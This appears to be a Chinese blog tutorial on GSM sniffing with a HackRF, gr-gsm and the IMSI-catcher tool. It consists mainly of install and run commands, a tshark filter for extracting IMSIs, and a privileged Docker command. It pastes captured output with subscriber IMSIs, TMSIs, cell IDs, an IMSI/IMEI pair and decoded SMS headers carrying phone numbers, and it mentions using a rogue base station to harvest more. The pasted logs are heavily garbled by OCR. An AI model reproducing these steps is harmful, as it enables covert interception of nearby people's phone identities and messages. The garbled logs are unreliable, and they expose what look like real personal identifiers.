D~DIDI~DIDIDI!!!!

0%

GSM嗅探

Posted on

使用hackrf 结合 hackrf-kalibrate可以快速寻找GSM频点

kalibrate-hackrf,它能够在已知的GSM频率之间跳动,并能够识别到你的国家所使用的频率

安装使用gr-gsm,经过gr-gsm处理后,GnuRadio模块会解码GSM数据包

sudo apt-get install git cmake libboost-all-dev libcppunit-dev swig doxygen liblog4cpp5-dev python-scipy
git clone https://github.com/ptrkrysik/gr-gsm.git
cd gr-gsm
mkdir build
cd build
cmake ..
make
sudo make install
sudo ldconfig

可以通过tshark获取IMSI,

也可以下载IMSI-catcher,可以进行IMSI的获取

git clone https://github.com/Oros42/IMSI-catcher.git

安装依赖库,可以装python3

sudo apt install python-numpy python-scipy python-scapy

进入IMSI-catcher

运行该命令,启动GSM频点的自动探测与数据捕获解析,服务端口4730

python3 scan-and-livemon

skygo-sdr:IMSI-catcher (master*) $ python3 scan-and-livemon scan-and-livemon:18: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses import imp Locating potential GSM base station frequencies (this can take a few minutes) . Found 2 frequences Listening on the frequencies for 1 potential GSM base stations. Starting livemon for freqency 945000000, server on port 4730 [INFO] [UHD] Linux; GNU C++ version 9.2.1 29200394; Boost 107100; UHD 3.15.0.O-2bui1d5 gr-osmosdr 0.2.0.0 (0.2.0) gnuradio 3.8.1.0 built-in source types: file osmosdr fcd rtl rtl tcp uhd miri hackrf bladerf rfspace airspy airspyhf soapy redpitaya freesrp Using HackRF One with firmware 2018.01.1

运行tshark可直接查找IMSI

sudo tshark -i lo -Y “e212.imsi”-V 2>&1 | sed ‘s/^[ \t]//;s/[ \t]$//‘2>&1 | grep “IMSI:”

运行该命令,查找数据中的imsi等信息,默认端口4729,可手动指定

python3 simple_IMSI-catcher.py -p 4729

也可以sudo python3 simple_IMSI-catcher.py -s

sudo python3 py —s Unable to init server: Could not connect: Connection refused Unable to init server: Could not connect: Connection refused py: 22688): Gdk— n: gdk_ CRITICAL 2021-09-08T11 : 48 : 55.578848 2021-09-08T11 : : 55.909646 2021-09-08T11 : .754782 2021-09-08T11 : 49 : 06.267117 2021-09-08T11 : 49 : 07.245173 2021-09-08T11 : : 07.245220 2021-09-08T11 : 10.723120 : : 10.850068 2021-09-08T11 : 49 : 10.852056 cursor assertion (display) ' Nb INSI , 2 3 5 6 7 7 8 9 10 TMSI-I , OxccaOd83b , oxf8986973 , , Oxa278b9ac , Ox5a90e5b2 , Oxe89f9@2b , , Oxfcb3ee79 oxf89ba113 , , exd2974807 , Oxf3a1088e , TMS1-2 oxd@992020 Oxe99e6032 , ox75759b0U oxf4b3f7ed , Oxd29dd@27 Oxf099@Oa1 IMSI 460 • 460 460 u 60 460 460 • 460 460 460 460 460 failed LAC 4421 UU21 4421 4421 4421 4421 UU21 4421 4421 , Cellid , 41285 41285 , 41285 , 41285 41285 , 41285 41285 , 41285 , 41285 • Timestamp 04 02 02 07 00 00 04 8734309161 1391451238 6221344016 0399580025 7112654954 1395040463 7463508911 1395040463 9786508262 1251954648 4809913105 country China China Ch in a China China China Ch in a China China brand China China China China China China China China China China , China Mobile Mobile Mobile Mobile Mobile Mobile Mobile Mobile Mobile Mobile Mobile ; operator Global Star Satellite China Mobile China Mobile China Mobile China mobile China Mobile Global Star Satellite China Mobile Global Star Satellite China mobile , Global Star Satellite MCC 460 u 60 460 460 • 460 460 460 460 460 , 00 , 00 2021-09-08T11 : 49. • 04.493487 2021-@9-@8T11. •49. 04. 758094

使用wireshark可以获取大量信息,包括IMSI,短信等,先通过主动接入自己的基站,可以获取到IMSI,再通过grgsm获取到更多信息

{“status”: true, “message_id”: 1, “message”: “Success”, “infos”: [[“460022978370785”, “351615087961130”, “”, null]]}

GSM A-I/F RP - RP-DATA (Network to MS) Message Type RP•DATA (Network to MS) • RP-Or iginator Address - ( 8613809100587 ) Length: 8 . . — Extension: NO Extension eel . Type of number: International Number (Oxl) eeel Numbering plan identification: ISDN,'Te1ephony Numbering (ITU-T Rec. called Party BCD Number: 8613800100587 RP-Destination Address RP-User Data GSM TPDU (GSM 03.40) SMS-DELIVER = TP-RP: TP Reply Path parameter is not set in this sys SUBMIT/DELIVER — TP-UDHI: The TP UD field contains only the short message . = TP•SRI: A status report shall be returned to the SME TP-LP: The message has not been forwarded and is not a spawned message TP-MMS: More messages are waiting for the MS in this SC . .60 = TP-MTI: SMS-DELIvER (6) • TP-Originating -Address - (95533) Length: 5 address digits E.164 ITU-T Rec. E. 163) (exi) .elø . . Extension: No extension Type of number: National (2) . ee61 = Numbering plan: ISDN/te1ephone (E. 164/E.163) (1) TP-OA Digits: 95533 TP-PID: TP-Dcs: 8 TP-Service-Centre-Time-Stamp TP-User-Data-Length: (110) depends on Data-coding-scheme TP-User-Data SMS text:

GSM A-I,'F DTAP - CP-DATA • GSM A-I,'F RP - RP-DATA (Network to MS) Message Type RP-DATA (Network to MS) RP-Message Reference RP-originator Address - (8613800226306) Length: 8 . Oel — Extension: No Extension = Type of number: International Number (oxl) Numbering plan identification: ISDN/TeIephony Numbering (ITU-T Rec. . øøel called Party BCD Number: 8613800226306 RP-Destination Address RP-User Data GSM sys TPDU (GSM 03.40) SMS-DELIVER - TP-RP: TP Reply Path parameter is not set in this SMS SUBMIT,'DELIVER E.164 / ITU-T Rec. E.163) (exl) . = TP-UDHI: The beginning of the TP UD field contains a Header in addition to the short message TP-SRI: A Status report shall be returned to the SME = TP•LP: The message has not been forwarded and is not a spawned message = TP-MMS: No more messages are waiting for the MS in this SC ..ee = TP-MTI: SMS-DELIVER (e) TP-Originating-Address - (10686109) Length: 8 address digits .ßee . — Extension: No extension Type Of number: Unknown (e) Numbering plan: Unknown (e) . øøee TP-OA Digits: 10086109 TP-PID: e TP•DCS: 8 TP-service-centre-Tirne-stamp TP-User-Data User-Data Header sys text:

Oros42/IMSI-catcher: This program show you IMSI numbers of cellphones around you. (github.com)

可以本地,也可以直接docker

docker pull atomicpowerman/imsi-catcher

docker run -ti –net=host -e DISPLAY=$DISPLAY –privileged -v /dev/bus/usb:/dev/bus/usb –name=gsm_imsi_catcher atomicpowerman/imsi-catcher bash